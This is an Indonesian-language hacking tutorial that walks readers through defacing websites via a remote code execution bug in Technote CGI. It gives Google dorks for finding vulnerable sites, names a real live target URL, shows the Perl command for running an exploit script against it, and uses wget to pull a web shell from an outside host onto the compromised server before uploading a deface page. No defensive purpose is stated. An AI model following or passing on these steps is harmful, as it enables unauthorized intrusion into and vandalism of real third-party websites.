tutorial deface RCE(REMOTE CODE EXECUTION) Technote CGI Exploit 0.4

Assalamualikum wr.wb kali ini saya akan memberikan tutorial tutorial deface RCE(REMOTE CODE EXECUTION) Technote CGI Exploit 0.4 sebenarnya ini bug sudah lama sekali,ah sudahlah ntr kalian baper baca kisahnya hehe.

ok pertama kalian siapkan adalah

-kopi buat nyantai

-kond*m mana tau sesak ng*we

-udud,trus kalian buang,karena rokok membunuhmu :v

-perl,untuk cara installnya cari gugle ya gan

atau kalian bisa mengguanakan perl dari xampp,untuk cara memakai perl di xampp simak saja nanti :v

-script exploit rce

untuk dork kalian bisa pakai:

1. - Google Dork 1 : inurl:/cgi-bin/technote/
2.     - Google Dork 2 : inurl:".cgi?board=FREE_BOARD"
3.     - Google Dork 3 : intext:"TECHNOTE-TOP"

pertama kalian dorking menggunakan salah satu dork di atas

pilih satu per satu website yang ada di google dork

disini saya sudah memiliki live target http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD

ok selanjutnya kalian buka terminal kesayangan kalian disini saya memakai cmder.

-nah untuk yang belum install perl tapi sudah install xampp tinggal taruh exploit nya di \xampp\perl\bin

setelah itu kalian jalankan exploiter dengan command:
perl exploit.pl http://www.a-17.com/a17bd/main.cgi?board=FREE_BOARD

jika vuln maka akan muncul seperti di gambar bawah ini

selanjutnya kalian ketil ls,cd board,lalu kalian bisa melakukan wget untuk mengupload shell

example wget -O mek,php site.com/shell.txt

apa bila berhasil maka kurang lebih seperti ini

selanjutnya check shell kalian,gimana checknya? http://www.a-17.com/a17bd/board/shell.php

selanjutnya upload script deface kalian:v

Share this post